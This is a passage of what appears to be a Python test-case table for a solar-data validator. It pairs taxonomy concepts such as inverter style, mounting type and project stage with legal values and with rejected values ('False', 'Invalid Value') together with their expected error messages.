"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "GEOJson",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:gISFileFormatItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:gISFileFormatItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Revenue Put",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Surety Solar Module Supply Bond",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:insuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:insuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:NetworkType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:internetConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:NetworkType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:internetConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:NetworkType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "MicroInverter",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:inverterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:inverterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InverterStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Three Phase WYE",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:inverterPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:inverterPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InverterOutputPhaseType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Partial Funding",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:investmentStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:investmentStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectInvestmentStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Fund Level",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mORLevelItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mORLevelItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonthlyOperatingReportLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "BiFacial",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Portrait",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleOrientationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleOrientationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleOrientation",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Multi-C-Si",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleTechnologyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:moduleTechnologyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ModuleTechnology",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Ballasted",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mountingItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:mountingItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MountingType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Owner Occupied",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:occupancyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:occupancyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SitePropertyOccupancyType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Attached",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:optimizerTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:optimizerTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:OptimizerType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Workers Compensation Insurer",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:participantItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:participantItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ParticipantRole",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Incomplete",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:preventiveMaintenanceTaskStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:preventiveMaintenanceTaskStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemPreventiveMaintenanceTasksStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Solar Plus Storage",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectAssetTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectAssetTypeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectAssetType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Community Solar",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectClassItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectClassItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectClassType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Virtual Net Meter",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectInterconnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectInterconnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectInterconnectionType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Early Construction",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectPhaseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:PhaseOfProjectNeeded",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "In Operation",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectStageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:projectStageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectStage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Not Submitted",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RegulatoryApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "EWG",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryFacilityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Project", "value is not legal for type solar-types:regulatoryFacilityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RegulatoryFacilityType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Letter of Credit",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveCollateralItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveCollateralItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ReserveCollateralType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Maintenance",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveUseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:reserveUseItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ReserveUse",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RoofType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofSlopeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:roofSlopeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:RoofSlopeType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Lease",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "value is not legal for type solar-types:siteControlItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Site", "value is not legal for type solar-types:siteControlItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteControlType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Agricultural",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:solarSystemCharacterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:solarSystemCharacterItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Insufficient",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:sparePartsStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:sparePartsStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemSparePartsStatusLevel",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Islanded",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemAvailabilityModeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemAvailabilityModeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemAvailabilityMode",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Communication Failure",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type solar-types:systemOperationalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemOperationStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
